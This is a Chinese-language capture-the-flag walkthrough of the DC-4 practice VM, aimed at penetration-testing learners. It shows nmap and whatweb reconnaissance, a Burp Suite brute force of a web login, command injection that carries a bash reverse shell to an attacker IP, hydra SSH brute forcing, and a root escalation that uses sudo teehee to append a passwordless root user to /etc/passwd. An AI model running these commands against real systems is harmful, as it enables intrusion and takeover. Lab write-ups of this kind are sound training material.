靶机信息

DESCRIPTION
DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

TECHNICAL INFORMATION
DC-4 is a VirtualBox VM built on Debian 32 bit, so there should be no issues running it on most PCs.

If there are any issues running this VM in VMware, have a read through of this.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox and away you go.

IMPORTANT
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.

In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.

CONTACT
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).

I can be contacted via Twitter - @DCAU7

信息收集

部署完靶机后扫描nmap获得ip地址,一个是kali的ip,另一个就是靶机的ip,之后再扫描主机的开放端口

#ping扫描网段内的主机
nmap -sP 10.0.0.0/24
#扫描主机端口
nmap -sV -p- 10.0.0.20

QQ截图20210223083636.png

根据扫描结果,访问80端口

QQ截图20210223083838.png

使用whatweb获取信息

whatweb 10.0.0.20

QQ截图20210223084835.png

flag1

只有1个表单和ssh,先尝试burpsuite爆破表单,抓包后发送到intruder模块

QQ截图20210223090808.png

payload加载爆破字典

QQ截图20210223091327.png

开始攻击

QQ截图20210223091603.png

获得结果

QQ截图20210223130123.png

发现通过修改参数可以直接实现命令注入

QQ截图20210223133021.png

获得反弹shell

POST /command.php HTTP/1.1
Host: 10.0.0.20
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.20/command.php
Cookie: PHPSESSID=utki8evce1u13sugjcfbr5esv0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 57


radio=echo+"bash+-i+>%26+/dev/tcp/10.0.0.221/1234+0>%261"+|+bash&submit=Run

QQ截图20210223133745.png

查看/home/jim目录下有内容,backups中有1个密码字典,有个test.sh的脚本

QQ截图20210223134046.png

利用该字典进行ssh爆破

hydra -L ./user.dic -P pass.dic 10.0.0.20 ssh

QQ截图20210223141716.png

使用ssh登录,查看mbox文件内容

#jibril04
ssh jim@10.0.0.20

QQ截图20210223142012.png

根据这个信息联想到系统邮件,在系统组找到了另一个账号的密码,并登录该账户

QQ截图20210223142305.png

查看该命令的帮助可以写入文件内容,可以尝试插入一个用户,或者定时任务来修改文件bash权限达到获取root权限

QQ截图20210223142932.png

sudo teehee -a /etc/passwd

roots::0:0:::/bin/bash

su roots

QQ截图20210223143247.png

QQ截图20210223143254.png

QQ截图20210223143417.png